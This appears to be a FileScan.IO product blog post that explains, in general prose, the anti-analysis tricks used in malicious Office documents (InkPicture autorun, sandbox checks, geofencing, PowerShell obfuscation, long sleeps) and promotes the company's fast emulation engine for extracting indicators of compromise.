Today, malicious documents (so called "maldocs") are a very common initial attack vector (e.g. as part of E-Mail attachment). Over time, threat actors have improved the techniques used behind malicious office files to make indicator of compromise (IOC) extraction and general detection more difficult. Such techniques include VBA macro obfuscation, environment and geofencing checks for targeted attacks, anti-analysis tricks (e.g. big sleep / sleep loops) and implementing additional obfuscation layers (e.g. via obfuscated cmd/powershell and vbs/js scripts). Only after unwrapping and bypassing all of these layers, the actual payload / malware is downloaded from an external host. Thus far, the only solution has been to execute office files within an isolated environment (sandbox) and monitor its behavior (e.g. network connections). This requires a complex setup, is time and resource intensive.
We have taken on the challenge of implementing sophisticated emulators that can unwrap these "matryoshka"-like maldocs at a 10x speed improvement vs. traditional sandboxing solutions.
As part of our free community site launch at FileScan.IO, we want to showcase a few interesting files that contain today's anti-analysis and obfuscation techniques, as well as demonstrate the results of our engine processing those files successfully. For your pleasure, please follow the cross-referenced links in our footer section to dive even deeper into the respective techniques.
Example Techniques (Sample #1)
The file implements the following techniques:
InkPicture
This technique has been described widely[1] in the industry as a method to execute malicious code upon opening the document in the targeted machine. Instead of using the classic Document_Open, or Auto_Open events, InkPicture belongs to a group of ActiveX controls that will launch VB macro code when the document is opened.
Document name checking
Certain malware families have implemented checks that read the document name prior to execution, as often analysis systems will rename files prior analysis[2]. Thus, it is important to analyze a file in an environment as close to the "would be" environment as possible.
Recent file count
Another known anti-analysis technique implemented by maldoc authors is to check the total number of recent documents opened by Word historically[3], as a vanilla Windows installation (often used as part of a simple sandbox setup) will have no recent documents and/or very few usage artifacts in general. If the system that analyzes the malware isn't prepared properly, no malicious code will be executed.
Geofencing protection
Some malware campaigns focus on a speific region due to certain interests like geopolitics. It's common for malware campaigns[4] to implement a technique dubbed geofencing. More precisely, malware will check the region where it's being executed in (e.g. by checking the system language or network outbound IP geolocation) before downloading any payloads. As knowing the payload download location (e.g. a specific external host) is the key Indicator of Compromise that an analysis is interested in, failing to bypass such checks is extremely unfortunate. There is means of bypassing such checks in automated systems (e.g. having a list of pre-configured VPN servers to choose from, allowing to emulate a specific region). However, as often it is not known a priori, manual inspection of an initial analysis is necessary to understand what the right system configuration is needed, followed by additional analysis. A very time consuming task. Wouldn't it be nice to bypass geofencing checks the first time around in a matter of seconds?
Example Techniques (Sample #2)
Powershell obfuscation
The actual payload download is hidden behind an obfuscated powershell commandline. Typical anti-analysis techniques involve Base64 encoding, using GZIP-inflated stream of bytes, using string concatenation tricks and invoke-obfuscation.
IOCs hidden behind multiple obfuscation layers
Long sleeps
A typical anti-analysis technique that involves sleeping a long time before performing additional malicious activity. In this case, a long sleep is performed after sending a HTTP request to the payload delivery host.
Why does the analysis time matter?
Organizations need systems that can get insights (e.g. IOCs) from the attack chain of files arriving at their perimeters, as quickly as possible. Today, the attack surface has become quite broad compared to what was the case in the old economy. While we still have the traditional inbound E-Mails, we also have a wide range of cloud services, network shares, bring-your-own-device ("BYOD"), remote workers connected to poorly secured home networks, among other attacks schemes, which expose endpoints to unknown files. Therefore, it is a key challenge to being able to extract IOCs from a large quantity of incoming files quickly, as that allows instant blocking and internal scanning.
We are excited to present a solution that can beat nearly all known methods of evasion techniques used by cybercriminals in the wild to give insights into a large part of the full attack chain in less than 30 seconds*. This is possible due to our unique and sophisticated, proprietary emulation engines that are capable of analyzing VBA, Powershell, CMD, VBScript and Javascript.
FileScan.IO Analysis Report
The platform provides the user an overview of the submitted file with all the results that our engine extracted during the analysis. The summary will help the user to understand if the file is malicious or not and which signals (Our behavior signatures) matched during the analysis:
Emulation Data Results
The most interesting section of FileScan is our emulation engine. The sample mentioned at the beginning of the article contains as we exposed several techniques that combined between them convert the file ins something difficult to analyze automatically to get the final stage. When the file is executed in our platform, the system will detect the different anti-evasion techniques and beat them in order to get the full chain execution:
Our emulation engine will be able to detect and beat all the known anti-evasion techniques used and get the final payload behind this document file:
As can be seen in the screenshot above, the FileScan.IO engine was able to emulate the file and beat all the anti-evasion methods found to obtain the write event that will occur when the expected scenario occurs and the file can be executed.
Indicators of Compromise
All extracted (potential) IOCs from the input file, any emulation layer, extracted/downloaded file, etc. are aggregated and presented in a simple type-ordered overview page from the top left menu.
You can use these IOCs to quickly find related samples, perform additional threat intelligence research, update your security perimeter / firewalls and scan your corporate network for other potentially compromised endpoints.
* the average analysis time is ~15 seconds per file, but outliers remain.
References / Foot notes